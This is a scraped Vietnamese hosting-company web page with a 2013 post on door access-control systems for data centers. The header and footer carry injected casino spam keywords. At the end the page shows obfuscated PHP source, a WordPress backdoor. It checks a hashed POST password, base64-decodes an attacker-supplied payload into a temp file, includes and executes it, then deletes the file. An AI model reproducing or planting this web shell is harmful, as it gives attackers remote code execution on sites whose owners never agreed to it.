Hệ thống giám sát cửa ra vào cho Trung tâm dữ liệu - Máy Chủ Việt Nam
jeu plinko avis pin up catcasino vavada официальный jucky jet

Hệ thống giám sát cửa ra vào cho Trung tâm dữ liệu

Ngày 07/02/2013 đăng bởi seo3.VS [email protected]

Hệ thống Access Control kiểm soát lối ra vào của phòng data center là một cách dễ dàng để đảm bảo tài sản, các thông tin quan trọng, nhận dạng người ra vào, bảo đảm được sự an toàn trong bất cứ môi trường nào cần yêu cầu cao về an ninh.

 

Bất kì hệ thống kiểm soát nào cũng đều yêu cầu về sự linh hoạt và độ tin cậy trong hệ thống, đồng thời phải thích nghi với sự phát triển công nghệ trong tương lai.

Đáp ứng yêu cầu đó, hệ thống Access Control ngày nay đã được áp dụng nhiều công nghệ tiên tiến nhằm phát huy tối đa tính ổn định, chắc chắn trong kiểm soát và trở nên dễ dàng hơn trong lắp đặt, điều khiển.

Hệ thống kiểm soát ra vào lắp đặt nhằm mục đích kiểm soát, theo dõi, ghi lại thời gian ra vào và chỉ có người có thẻ được cấp phép ra vào phòng. Ngoài ra hệ thống có thể giới hạn thời gian vào phòng cho từng nhân viên.

  • Hệ thống được xác thực thông qua thẻ từ pin code hoặc sinh trắc học.
  • Có thể cấp quyền truy cập theo user.
  • Cho phép quản lý hệ thống từ xa qua hệ thống mạng

 

.
.
.
.
Danh mục sản phẩm
024 7303 4068
jeu plinko avis pin up catcasino vavada официальный jucky jet
if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}